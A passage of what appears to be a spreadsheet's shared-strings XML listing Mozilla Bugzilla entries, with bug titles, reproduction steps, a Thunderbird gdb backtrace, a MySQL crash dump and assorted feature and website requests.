    <t>crash when i modify (by JS) colSpan value</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4) Gecko/20030908 Debian/1.4-4
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4) Gecko/20030908 Debian/1.4-4
Mozilla crash when i modify colspan value of the third th element. If i invert
the line with the next one that's ok. (The next one changes the style.display
property).
Reproducible: Always
Steps to Reproduce:
1. Go to the URL
2. Click on the 'eeee' check box
3. Click on the 'ffff' check box
Actual Results:  
Big crash :-/
Expected Results:  
it shouldn't crash :P
maybe should it throw a javascript exception if these steps are forbidden (?).</t>
  </si>
  <si>
    <t>magic</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-502346</t>
  </si>
  <si>
    <t>mozillaservice.org</t>
  </si>
  <si>
    <t>ko translation of Mozilla Service Week</t>
  </si>
  <si>
    <t>I prepare this work.</t>
  </si>
  <si>
    <t>SEAMONKEY-110229</t>
  </si>
  <si>
    <t>update UA string to 0.9.6+</t>
  </si>
  <si>
    <t>You guys might want to update the tip to 0.9.6+.</t>
  </si>
  <si>
    <t>NSS-166718</t>
  </si>
  <si>
    <t>certificate verification should consider revocation date in CRL entries</t>
  </si>
  <si>
    <t>This bug is to track the NSS change in 3.6.
Before 3.6 we didn't consider the revocation date when checking for a revoked
certificate. If it was listed on the CRL it was considered revoked.
In 3.6 I reworked the code and added the CRL cache. I also added code that
checks the date passed to SEC_CheckCrl so that the certificate will only be
considered revoked if that time is after the revocation date in the CRL entry.
This has implications for clients. For example it is now possible to
successfully verify old S/MIME messages which were signed with a certificate
that was revoked at a later date.</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-500119</t>
  </si>
  <si>
    <t>Tracking bug for update of mozilla-europe firefox page for Firefox 3.5</t>
  </si>
  <si>
    <t>This is a tracking bug for the translation of mozilla-europe.org Firefox page for the firefox 3.5 releasea</t>
  </si>
  <si>
    <t>FIREFOX-405605</t>
  </si>
  <si>
    <t>[meta] Theme (css) changes for Windows XP and Vista</t>
  </si>
  <si>
    <t>This is a tracking bug for changes to the Windows theme that will impact both XP and Vista.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-492752</t>
  </si>
  <si>
    <t>Please update Prism website from SVN</t>
  </si>
  <si>
    <t>I've fixed https://bugzilla.mozilla.org/show_bug.cgi?id=492432 and changed Get Started to Download Now on Aza's suggestion. Also a few other small fixes.</t>
  </si>
  <si>
    <t>WEBSITES-528366</t>
  </si>
  <si>
    <t>Nicole Loux needs to be removed from syndication</t>
  </si>
  <si>
    <t>http://weekinthenee.wordpress.com/feed/
The above feed needs to be removed and the last posted deleted from Planet.</t>
  </si>
  <si>
    <t>CORE-429865</t>
  </si>
  <si>
    <t>ASSERTION: prev sibling not in line list with floating :first-letter :after RLO</t>
  </si>
  <si>
    <t>Created attachment 316634
testcase
Loading the testcase triggers:
###!!! ASSERTION: prev sibling not in line list: 'Not Reached' file /Users/jruderman/trunk/mozilla/layout/generic/nsBlockFrame.cpp line 4805
###!!! ASSERTION: unknown out of flow frame type: 'disp-&gt;mDisplay == NS_STYLE_DISPLAY_POPUP' file /Users/jruderman/trunk/mozilla/layout/generic/nsHTMLReflowState.cpp line 522</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-185729</t>
  </si>
  <si>
    <t>[RFE] ChatZilla doesn't support ban lists (RFC 2812)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021207 Phoenix/0.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021211
According to RFC 2812 (http://www.ietf.org/rfc/rfc2812.txt) the client should
obtain the ban list using MODE  +b. ChatZilla does have all the stuff
to store ban information and it in fact does if the ban is set while in the
channel (it responds to channel mode changes for settings bans fine).
Reproducible: Always
Steps to Reproduce:
1. Join an IRC channel with a different client (mIRC BitchX X-Chat whatever).
2. Set a ban on the channel (doesn't matter what I use *!stuff@*).
3. Join the same channel in ChatZilla.
4. Use the command /eval dumpObject( client.currentObject.bans ) to show a
list of the channels bans.
Actual Results:  
The list is empty.
Expected Results:  
The list should have the ban added from the other client.
This should be fairly straight forward just send the appropriate MODE command
on joining the channel and then parse the replies.
If you try setting/removing bans while ChatZilla is connect to the channel you
should see that it works fine (repeat step 4 to see the ban list at any point).</t>
  </si>
  <si>
    <t>CORE-14408</t>
  </si>
  <si>
    <t>Can't tell which tab in the standalone is selected</t>
  </si>
  <si>
    <t>There is no visual feedback in tab widget that allows a user to tell which tab
is selected (online vs list setup).</t>
  </si>
  <si>
    <t>CORE-304162</t>
  </si>
  <si>
    <t>Integrate necko unit tests into tinderbox</t>
  </si>
  <si>
    <t>Necko unit tests should be integrated into tinderbox so that the tree turns
orange when one of these tests fails.
bsmedberg recently added another test (TestVersionComparator iirc) but that
one is run during make libs. I'm not sure this is great. I suggest adding a
treewide make check target that runs the various automated tests that are
available. (automake provides the same target).
Tinderbox could automatically run make check on the tree if tests are enabled.
What do you think?</t>
  </si>
  <si>
    <t>CORE-461549</t>
  </si>
  <si>
    <t>Traceable print and shapeOf functions for js shell</t>
  </si>
  <si>
    <t>Created attachment 344652
v1
I found them useful for debugging bug 456384 (v8-richards) YMMV.</t>
  </si>
  <si>
    <t>SEAMONKEY-63654</t>
  </si>
  <si>
    <t>Folder pane shouldn't be resized when mail window is resized</t>
  </si>
  <si>
    <t>Whenever I launch MailNews the first thing I do is carefully align the size of 
the folder pane so that it matches the width of the widest folder name (this is 
how I believe most people want it at least the few ones I've asked). However 
as soon as the MailNews main window is resized the folder pane is also resized 
proportinally. 
If you increase the size of MailNews this means that space is wasted (folder 
pane with lots of whitespace) and if you decrease it the folders quickly become 
unreadable. I suggest that the folder pane size be fixed when entire window is 
resized.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-329617</t>
  </si>
  <si>
    <t>Hint does not work for select1</t>
  </si>
  <si>
    <t>THUNDERBIRD-461351</t>
  </si>
  <si>
    <t>Drop unnecessary includes from some of Thunderbird's migration code.</t>
  </si>
  <si>
    <t>Created attachment 344474
The fix
I wanted to drop the current (unnecessary) nsIPasswordManagerInternal.h includes in mail/components/migration but then I thought there may be some others so I did a bit of digging and removed a few extra.
This is just a very small part of the password manager migration/cleanup.
I've tested it on my mac and on linux (Linux builds with frozen API in that dir) and it seems to work fine.</t>
  </si>
  <si>
    <t>FIREFOX-511688</t>
  </si>
  <si>
    <t>Pretty up about:weave interactions</t>
  </si>
  <si>
    <t>There's a number of clunky parts like the verification of username/password just color things red/green. Could also use a progress thing to indicate that we're checking.
Error messages for creating are alerted.</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-444852</t>
  </si>
  <si>
    <t>eliminate LIR_arg just have LIR_call have all the offsets to the arg exprs</t>
  </si>
  <si>
    <t>CallIns has all the type information expressed by LIR_arg.  all the arguments can and should be processed when we see the LIR_call so having the extra reverse-following argument ops doesn't buy us anything but complexity (imho).</t>
  </si>
  <si>
    <t>SEAMONKEY-150597</t>
  </si>
  <si>
    <t>Back Button not working.</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.1a) Gecko/20020609
BuildID:    2002060908
When following links the Back button does not get enabled but the dropdown list
from the button is visible and does work. This is also in 1.0
Reproducible: Always
Steps to Reproduce:
1. Follow a Link
2. Try to use Back Button
3.
Actual Results:  Back button is not enabled.
Expected Results:  Backup should be enabled.</t>
  </si>
  <si>
    <t>FIREFOX-283777</t>
  </si>
  <si>
    <t>Right arrow key after selecting autocomplete result no longer uses selected item</t>
  </si>
  <si>
    <t>In html forms we used to be able to select an auto-complete item and hit the
right arrow and it would fill that item placing the caret at the end of that
word. Now hitting the right arrow dismisses autocomplete. IE's right arrow on
autocomplete does nothing. We used to be better and now we're either similar or
worse. It would be good to get this back to being better. Tested with 1.0.1 on
windows XP</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-293080</t>
  </si>
  <si>
    <t>Grendel component assignee changes</t>
  </si>
  <si>
    <t>All of the components in the Grendel component needs their owners changed. All 
of the people listed don't work on Grendel anymore. Here's my proposal (still 
up for debate so assigning to myself until we're final):
Component                  Owner                    QA
===============================================================
Addressbook/LDAP (non-UI)  talisman@anamorphic.com [generic QA]
Preferences                rj.keller@beonex.com    [generic QA]
Protocols                  talisman@anamorphic.com [generic QA]
User Interface             rj.keller@beonex.com    [generic QA]
We also need Grendel to not be listed as a Dormant project on the Bugzilla 
products page. Grendel's reborn :D.</t>
  </si>
  <si>
    <t>CORE-68702</t>
  </si>
  <si>
    <t>Implement inter-process communication (IPC) in Mozilla (protozilla)</t>
  </si>
  <si>
    <t>Currently Mozilla's interaction with external programs is limited to
launching helper applications to handle certain MIME types and protocols
(even this feature is not fully implemented yet see bug 68406). This is
a one-way interaction in which a detached process is created. However
the process does not interact back with Mozilla. It would be nice to extend
necko so that Mozilla can execute an attached process write to its
standard input and read from its standard output using either
anonymous pipes or TCP socket pairs. This would facilitate the following:
 - writing external protocol handlers that return HTML and other types of
   MIME content back to Mozilla for display in the browser window
   (client side CGI)
 - executing arbitrary programs from Javascript using xpconnect
   and capturing the output of the command as a string.
   (this is similar to the `backtick` feature found in many shells)
These features can be used to add very general protocol handler capabilities
to Mozilla and support the registration of new URI schemes (see bug 68406).
NSPR already supports attaching anonymous pipes or TCP socket pairs to a
process to capture its stdin/stdout. However an IPC implementation must
also allow asynchronous I/O to interact with the process to be able to
run the program without blocking the UI thread.
A working C++/XPCOM IPC implementation is already available as part of the
external Protozilla project (http://protozilla.mozdev.org). This bug is simply
a request by the author of the code that it be incorporated into the Mozilla
CVS tree (unless someone can come up with an alternative IPC implementation).
You can browse the IPC code directly using the following link:
   http://mozdev.org/lxr/source/protozilla/pipella/base/
There are three possible locations where this code could be incorporated:
 - necko
 - xpcom
 - mozilla/extensions/ipc
Since the first two locations would require module owner approval and more
extensive review in the short term it may be better to import it into
mozilla/extensions/ipc and let it bake there for a while. Even if mozilla.org
approves this extension the code still needs to reviewed and super-reviewed
of course. If approved it is important that the extension be normally enabled
for default compilation. Otherwise there isn't that much benefit to it being
a part of the Mozilla code base.
Code issues:
 - interaction with other modules: the code is self-contained and should
   only affect those who start using the new IPC features
 - security: I don't think there are any new security issues associated with
   adding the IPC feature since it is quite similar to the nsIFile.spawn
   method which already allows xpconnect to execute an arbitrary program.
   (Protozilla itself has other security issues associated with the use of
    special URLs which is addressed in bug 68406 but they do not affect the
    IPC component of Protozilla)
 - threading and ownership models: the code was written by someone (me!)
   who only has a limited understanding of how necko and the URL loading
   process work. (Blame the poor or non-existent documentation for this!)
   So it is important that the code be reviewed by a necko expert.</t>
  </si>
  <si>
    <t>svn</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-936943</t>
  </si>
  <si>
    <t>[sr-Cyrl] Gaia: Translated manifest file /apps/homescreen/manifest.properties</t>
  </si>
  <si>
    <t>Current:
* name=Homescreen
* description=Ð“Ð°Ñ˜Ð¸Ð½ Ð´Ð¾Ð¼Ð°Ñ›Ð¸ ÐµÐºÑ€Ð°Ð½
Proposed:
* ÐŸÐ¾Ñ‡ÐµÑ‚Ð½Ð¸ ÐµÐºÑ€Ð°Ð½
* Gaia Ð¿Ð¾Ñ‡ÐµÑ‚Ð½Ð¸ ÐµÐºÑ€Ð°Ð½</t>
  </si>
  <si>
    <t>tumbas93</t>
  </si>
  <si>
    <t>MOZILLA.ORG-120213</t>
  </si>
  <si>
    <t>whosheriff needs --month and --year options</t>
  </si>
  <si>
    <t>As part of the migration to --calendar mode we should
print out more of the future for this script.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-305662</t>
  </si>
  <si>
    <t>Camino form controls are no longer native</t>
  </si>
  <si>
    <t>After bug 305291 landed Camino is using shitty-looking non-native form controls.</t>
  </si>
  <si>
    <t>CORE-369347</t>
  </si>
  <si>
    <t>JavaScript Tests - update test template copyright</t>
  </si>
  <si>
    <t>Created attachment 254019
patch
update template.js copyright from 2006 to 2007</t>
  </si>
  <si>
    <t>TESTING-480077</t>
  </si>
  <si>
    <t>automation.py.in : additional fix to bug 472706 for |runApp()| return value(s)</t>
  </si>
  <si>
    <t>CORE-12954</t>
  </si>
  <si>
    <t>should throw when setting non-settable props</t>
  </si>
  <si>
    <t>in liveconnect it's an error if you try to create new properties on native
objects:
js&gt; s = new java.lang.String(hi)
hi
js&gt; s.boo = boo!
js: Java class java.lang.String has no public instance field or method named
boo.
xpconnect lets you do that (no error occurs) but some weird stuff happens with
it:
js&gt; s = testObject
[xpconnect wrapped nsIXPCTestObjectReadWrite]
js&gt; s.boo =  hi
 hi
js&gt; s.boo
js&gt; typeof s.boo
undefined
js&gt; delete s.boo  // delete is supposed to return either true or false
[xpconnect wrapped nsIXPCTestObjectReadWrite]  // returns an XPCOM object
                                               // instead
js&gt; delete s.boo == s
true</t>
  </si>
  <si>
    <t>NSPR-277704</t>
  </si>
  <si>
    <t>LL_ZERO and friends should not use a function call with native ints</t>
  </si>
  <si>
    <t>when a native 64-bit int type is available it would be nice if LL_ZERO would
not need a function call. it can just be a #define for 0LL. similar for
LL_MAXUINT etc.</t>
  </si>
  <si>
    <t>CORE-13348</t>
  </si>
  <si>
    <t>Win32 - When BIG tag present highlighting wrong</t>
  </si>
  <si>
    <t>Build ID: 1999090808
Platform: Windows NT (not present on Linux not testable on Mac OS due to bad
older build)
To reproduce:
- Launch apprunner
- Load the above URL (Netscape internal) or attached test case
- Highlight the paragraph
Result: An underscore is distinctly visible in between the first two lines of
text starting to the right of the word 'Offering' (which is enclosed in BIG
tags).
Expected result: There should be no underscore (cf. IE 5).</t>
  </si>
  <si>
    <t>cpratt</t>
  </si>
  <si>
    <t>FIREFOX-250058</t>
  </si>
  <si>
    <t>Accesskeys for the submenu of View Sidebar are active however not underlined.</t>
  </si>
  <si>
    <t>Click on view and go to Sidebar (or press Alt+V+E). Notice how the two items
Bookmarks and History have no accesskeys underlined (as do the rest of the
menus). However pressing B (or Alt+V+E+B) or H (or Alt+V+E+H) will activate the
respective menu item. So the accesskey is active but not visible.</t>
  </si>
  <si>
    <t>cajunman4life</t>
  </si>
  <si>
    <t>THUNDERBIRD-505974</t>
  </si>
  <si>
    <t>Crash [@ nsMsgAccountManager::OnItemRemoved] deleting a local folder which had a saved search subfolder</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.1) Gecko/20090715 Lightning/1.0pre Thunderbird/3.0b3
(found while poking around Mozmill) Looks like a null crash.
Run search-window/test-search-window.js then delete the SearchWindowA folder. TB then crashes.
OR:
Create a new local folder put a message inside. Run a saved search inside the folder for that message saving as a saved search. Delete the whole local folder (including the saved search subfolder). TB then crashes.
bp-4a0c664b-870a-4d39-8c13-1701c2090723 (My Mac crash)
bp-0cd37460-3a47-4842-bb7d-8bd992090716 (another Linux folk's crash about a week ago)
xref bug 474247
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
nsMsgAccountManager::OnItemRemoved (this=0x12bccd80 parentItem=0x129b4f60 item=0xe589270) at /Users/skywalker/comm-central/mailnews/base/src/nsMsgAccountManager.cpp:3246
3246              parent-&gt;PropagateDelete(savedSearch PR_TRUE nsnull)
(gdb) bt
#0  nsMsgAccountManager::OnItemRemoved (this=0x12bccd80 parentItem=0x129b4f60 item=0xe589270) at /Users/skywalker/comm-central/mailnews/base/src/nsMsgAccountManager.cpp:3246
#1  0x0903daa1 in nsMsgMailSession::OnItemRemoved (this=0xe589270 aParentItem=0x129b4f60 aItem=0x1435fd30) at /Users/skywalker/comm-central/mailnews/base/src/nsMsgMailSession.cpp:197
#2  0x0900e388 in nsMsgDBFolder::NotifyItemRemoved (this=0x129b4f40 aItem=0x1435fd30) at /Users/skywalker/comm-central/mailnews/base/util/nsMsgDBFolder.cpp:4722
#3  0x0900ac16 in nsMsgDBFolder::PropagateDelete (this=0x129b4f40 folder=0x1435fd30 deleteStorage=0 msgWindow=0x1430d190) at /Users/skywalker/comm-central/mailnews/base/util/nsMsgDBFolder.cpp:3280
#4  0x090d4859 in nsMsgLocalMailFolder::CopyFolderLocal (this=0x143612b0 srcFolder=0x1435fd30 isMoveFolder=1 msgWindow=0x1430d190 listener=0x0) at /Users/skywalker/comm-central/mailnews/local/src/nsLocalMailFolder.cpp:2093
#5  0x0905d2b7 in nsMsgCopyService::DoNextCopy (this=0x12f9fef0) at /Users/skywalker/comm-central/mailnews/base/src/nsMsgCopyService.cpp:330
#6  0x0905d51a in nsMsgCopyService::DoCopy (this=0x12f9fef0 aRequest=0x13ce83f0) at /Users/skywalker/comm-central/mailnews/base/src/nsMsgCopyService.cpp:263
#7  0x0905d85d in nsMsgCopyService::CopyFolders (this=0x12f9fef0 folders=0x1090c910 dstFolder=0x143612d0 isMove=1 listener=0x0 window=0x1430d190) at /Users/skywalker/comm-central/mailnews/base/src/nsMsgCopyService.cpp:571
#8  0x090d32ff in nsMsgLocalMailFolder::DeleteSubFolders (this=0x129b4f40 folders=0x1090c910 msgWindow=0x1430d190) at /Users/skywalker/comm-central/mailnews/local/src/nsLocalMailFolder.cpp:1028
#9  0x002c8138 in NS_InvokeByIndex_P (that=0x129b4f60 methodIndex=28 paramCount=2 params=0xbfffd34c) at /Users/skywalker/comm-central/mozilla/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_unixish_x86.cpp:179
#10 0x096a0179 in ~AutoJSSuspendNonMainThreadRequest [inlined] () at /Users/skywalker/comm-central/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp:2454
#11 0x096a0179 in ~AutoJSSuspendNonMainThreadRequest [inlined] () at xpcprivate.h:3618
#12 0x096a0179 in XPCWrappedNative::CallMethod (ccx=@0xbfffd174 mode=XPCWrappedNative::CALL_METHOD) at /Users/skywalker/comm-central/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp:2073
#13 0x096a43aa in XPC_WN_CallMethod (cx=0xa71800 obj=0x0 argc=0 argv=0xe589270 vp=0x0) at /Users/skywalker/comm-central/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp:1590
#14 0x0017b74a in js_Invoke (cx=0xa71800 argc=2 vp=0xa728d4 flags=34) at jsinterp.cpp:1386
#15 0x0016b67e in js_Interpret (cx=0xa71800) at /Users/skywalker/comm-central/mozilla/js/src/jsinterp.cpp:5179
#16 0x0017b757 in js_Invoke (cx=0xa71800 argc=1 vp=0xa72824 flags=32) at jsinterp.cpp:1394
#17 0x0017bd24 in js_InternalInvoke (cx=0xa71800 obj=0x138f5580 fval=173211424 flags=0 argc=1 argv=0xa72820 rval=0xbfffdb54) at jsinterp.cpp:1447
#18 0x0013eb18 in JS_CallFunctionValue (cx=0xa71800 obj=0x0 fval=0 argc=0 argv=0x0 rval=0x0) at /Users/skywalker/comm-central/mozilla/js/src/jsapi.cpp:5187
#19 0x0adc71f6 in nsJSContext::CallEventHandler (this=0x12920ab0 aTarget=0x136325d0 aScope=0x128bb600 aHandler=0xa52ff20 aargv=0x1056a7f0 arv=0xbfffdcf8) at /Users/skywalker/comm-central/mozilla/dom/src/base/nsJSEnvironment.cpp:2035
#20 0x0ae00e10 in nsJSEventListener::HandleEvent (this=0x13651e80 aEvent=0x1057261c) at /Users/skywalker/comm-central/mozilla/dom/src/events/nsJSEventListener.cpp:247
#21 0x0ac9277d in nsEventListenerManager::HandleEventSubType (this=0x13670f10 aListenerStruct=0x13670f34 aListener=0x13651e80 aDOMEvent=0x1057261c aCurrentTarget=0x136325d0 aPhaseFlags=6) at /Users/skywalker/comm-central/mozilla/content/events/src/nsEventListenerManager.cpp:1098
#22 0x0ac92d73 in nsEventListenerManager::HandleEvent (this=0x13670f10 aPresContext=0xa7f800 aEvent=0xbfffe0bc aDOMEvent=0xbfffe004 aCurrentTarget=0x136325d0 aFlags=6 aEventStatus=0xbfffe008) at /Users/skywalker/comm-central/mozilla/content/events/src/nsEventListenerManager.cpp:1206
#23 0x0acb232c in nsCOMPtr::operator= () at nsCOMPtr.h:236
#24 0x0acb232c in nsEventTargetChainItem::HandleEvent (this=0x14fb8820 aVisitor=@0xbfffdffc aFlags=6 aMayHaveNewListenerManagers=1) at /Users/skywalker/comm-central/mozilla/content/events/src/nsEventDispatcher.cpp:237
#25 0x0acb2561 in nsEventTargetChainItem::HandleEventTargetChain (this=0x14fb8920 aVisitor=@0xbfffdffc aFlags=6 aCallback=0x0 aMayHaveNewListenerManagers=1) at /Users/skywalker/comm-central/mozilla/content/events/src/nsEventDispatcher.cpp:300
#26 0x0acb32a3 in nsEventDispatcher::Dispatch (aTarget=0x136325d0 aPresContext=0xa7f800 aEvent=0xbfffe0bc aDOMEvent=0x0 aEventStatus=0xbfffe100 aCallback=0x0) at /Users/skywalker/comm-central/mozilla/content/events/src/nsEventDispatcher.cpp:514
#27 0x0aaa72f1 in PresShell::HandleDOMEventWithTarget (this=0x0 aTargetContent=0x136325d0 aEvent=0xbfffe0bc aStatus=0xbfffe100) at /Users/skywalker/comm-central/mozilla/layout/base/nsPresShell.cpp:6363
#28 0x0abfdba8 in ~nsCOMPtr [inlined] () at nsCOMPtr.h:2074
#29 0x0abfdba8 in ~nsCOMPtr [inlined] () at /Users/skywalker/comm-central/mozilla/layout/xul/base/src/nsXULPopupManager.cpp:469
#30 0x0abfdba8 in ~nsXULCommandEvent [inlined] () at /Users/skywalker/comm-central/mozilla/layout/xul/base/src/nsXULPopupManager.cpp:1152
#31 0x0abfdba8 in ~nsXULCommandEvent [inlined] () at nsCOMPtr.h:1147
#32 0x0abfdba8 in nsXULMenuCommandEvent::Run (this=0x1434dc30) at /Users/skywalker/comm-central/mozilla/layout/xul/base/src/nsXULPopupManager.cpp:2074
#33 0x002b90fa in nsThread::ProcessNextEvent (this=0x416b90 mayWait=0 result=0xbfffe1ac) at /Users/skywalker/comm-central/mozilla/xpcom/threads/nsThread.cpp:510
#34 0x00279967 in NS_ProcessPendingEvents_P (thread=0x416b90 timeout=20) at nsThreadUtils.cpp:180
#35 0x0987b5f2 in nsBaseAppShell::NativeEventCallback (this=0x4439d0) at /Users/skywalker/comm-central/mozilla/widget/src/xpwidgets/nsBaseAppShell.cpp:121
#36 0x0984631a in nsAppShell::ProcessGeckoEvents (aInfo=0x4439d0) at /Users/skywalker/comm-central/mozilla/widget/src/cocoa/nsAppShell.mm:405
#37 0x92f5a595 in CFRunLoopRunSpecific ()
#38 0x92f5ac78 in CFRunLoopRunInMode ()
#39 0x9469428c in RunCurrentEventLoopInMode ()
#40 0x94693fde in ReceiveNextEventCommon ()
#41 0x94693f19 in BlockUntilNextEventMatchingListInMode ()
#42 0x926a9d0d in _DPSNextEvent ()
#43 0x926a95c0 in -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] ()
#44 0x926a25fb in -[NSApplication run] ()
#45 0x09845a6a in nsAppShell::Run (this=0x4439d0) at /Users/skywalker/comm-central/mozilla/widget/src/cocoa/nsAppShell.mm:720
#46 0x007aa0f7 in nsAppStartup::Run (this=0xbffff128) at /Users/skywalker/comm-central/mozilla/toolkit/components/startup/src/nsAppStartup.cpp:193
#47 0x00067db8 in XRE_main (argc=1 argv=0xbffff790 aAppData=0x40e610) at /Users/skywalker/comm-central/mozilla/toolkit/xre/nsAppRunner.cpp:3298
#48 0x00002ebf in main (argc=1 argv=0xbffff790) at /Users/skywalker/comm-central/mail/app/nsMailApp.cpp:103
(gdb) l
3241              nsCOMPtr parent
3242              rv = savedSearch-&gt;GetParent(getter_AddRefs(parent))
3243              NS_ENSURE_SUCCESS(rv rv)
3244              db = nsnull
3245              dbFolderInfo = nsnull
3246              parent-&gt;PropagateDelete(savedSearch PR_TRUE nsnull)
3247            }
3248            else
3249            {
3250            // remove leading '|' we added (or one after |folderURI if first URI)
(gdb) p parent
$1 = {
   = {
    mRawPtr = 0x0
  } }
(gdb)</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-221676</t>
  </si>
  <si>
    <t>Double clicking any mail filter crashes mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U AIX 000D86BD4C00 en-US rv:1.6a) Gecko/20031008
Build Identifier: Mozilla/5.0 (X11 U AIX 000D86BD4C00 en-US rv:1.6a) Gecko/20031008
This behavoir started sometime in the last week
Reproducible: Always
Steps to Reproduce:
1. Bring up mail filter window
2. Double click any mail filter rule (to edit it)
3. Mozilla crashes every time</t>
  </si>
  <si>
    <t>TOOLKIT-412381</t>
  </si>
  <si>
    <t>Clear Private Data should delete old signons.txt file(s).</t>
  </si>
  <si>
    <t>We've upgraded from signons.txt to signons2.txt and now to signons3.txt. Data is automatically imported from old files but the old files are not removed.
Clear private data calls nsILoginManager.removeAllLogins() which should go ahead and nuke any old files.
Related: Bug 329741 discusses deleting other files based on last-modified times.</t>
  </si>
  <si>
    <t>TESTING-689518</t>
  </si>
  <si>
    <t>error in pageloader causes talos + e10s to timeout in certain cases</t>
  </si>
  <si>
    <t>In pageloader we recently added support for measuring mozafterpaint instead of load in bug 661918.  In that patch at the end I had adjusted the variable from MozAfterPaint to useMozAfterPaint and overlooked one spot (which was not caught in my quick sanity check- didn't ensure it closed down just loaded pages).
This doesn't affect desktop currently only e10s builds.</t>
  </si>
  <si>
    <t>CORE-397305</t>
  </si>
  <si>
    <t>Leaking an nsStringBuffer+nsCStringArray (nsVoidArray) determining whether file paths start with a volume name</t>
  </si>
  <si>
    <t>Created attachment 282057
nsStringBuffer leak tree
URL and attached leak tree say it all without this fixed RLk won't drop to 0 on the Mac tinderboxen.  With the patch from bug 397134 applied these are the only leaks I see running RLk but I've been getting slightly flaky results running the test so I don't entirely trust a fix here plus a fix there to drop RLk to 0.
I don't know what the right fix is here to free the array at shutdown.  It may involve moving |net_GetFileFromURLSpec| into some utility class which can be allocated as a singleton in the IO service or something like that.  In any case I don't think we can localize a fix for this to just that function and we're going to have to rejigger the way every platform does that test at least a little.</t>
  </si>
  <si>
    <t>CORE-221826</t>
  </si>
  <si>
    <t>only create stack objects in Cut if they'll be used</t>
  </si>
  <si>
    <t>Trivial optimization found while investigating something else.</t>
  </si>
  <si>
    <t>CORE-141132</t>
  </si>
  <si>
    <t>Mozilla displays letter ï¿½ - the last letter of Cyrillic ABC in the other font than other letters</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:1.0rc1) Gecko/20020417
BuildID:    2002041711
Mozilla displays letter ï¿½ - the last letter of Cyrillic ABC in the other font
than other letters. This effect appears in some cases - default font on the
page Tab title text etc.
Reproducible: Always</t>
  </si>
  <si>
    <t>atmjav</t>
  </si>
  <si>
    <t>CORE-135698</t>
  </si>
  <si>
    <t>Scrollwheel doesn't work when mouse is over native widget or listbox</t>
  </si>
  <si>
    <t>go to any form page with a listbox (a bugzilla bug is a good one). hold the
mouse over the listbox or its scrollbar and the page doesn't scroll.
this also happens on osx classic skin if you hold the mouse over any of the page
scrollbars.
works on win32. i wonder how they handle directing the event to a native scrollbar.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-510746</t>
  </si>
  <si>
    <t>b01 database master crashing frequently</t>
  </si>
  <si>
    <t>tm-b01-master01 has hard-crashed 3 times today all three times with the exact same crash dump.  The query in the buffer at crash time seems to suggest that Deki is somehow triggering it though this is obviously a bug in MySQL...
090815 22:17:43 - mysqld got signal 6
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt improperly built
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help diagnose
the problem but since we have already crashed something is definitely wrong
and this may fail.
key_buffer_size=125829120
read_buffer_size=131072
max_used_connections=35
max_connections=1200
threads_connected=28
It is possible that mysqld could use up to 
key_buffer_size + (read_buffer_size + sort_buffer_size)*max_connections = 7649270 K
bytes of memory
Hope that's ok if not decrease some variables in the equation.
thd=0x2aaab4011040
Attempting backtrace. You can use the following information to find out
where mysqld died. If you see no messages after this something went
terribly wrong...
Cannot determine thread fp=0x45546fb0 backtrace may not be correct.
Stack range sanity check OK backtrace follows:
(nil)
Stack trace seems successful - bottom reached
Please read http://dev.mysql.com/doc/mysql/en/using-stack-trace.html and follow instructions on how to resolve the stack trace. Resolved
stack trace is much more helpful in diagnosing the problem so please do 
resolve it
Trying to get some variables.
Some pointers may be invalid and cause the dump to abort...
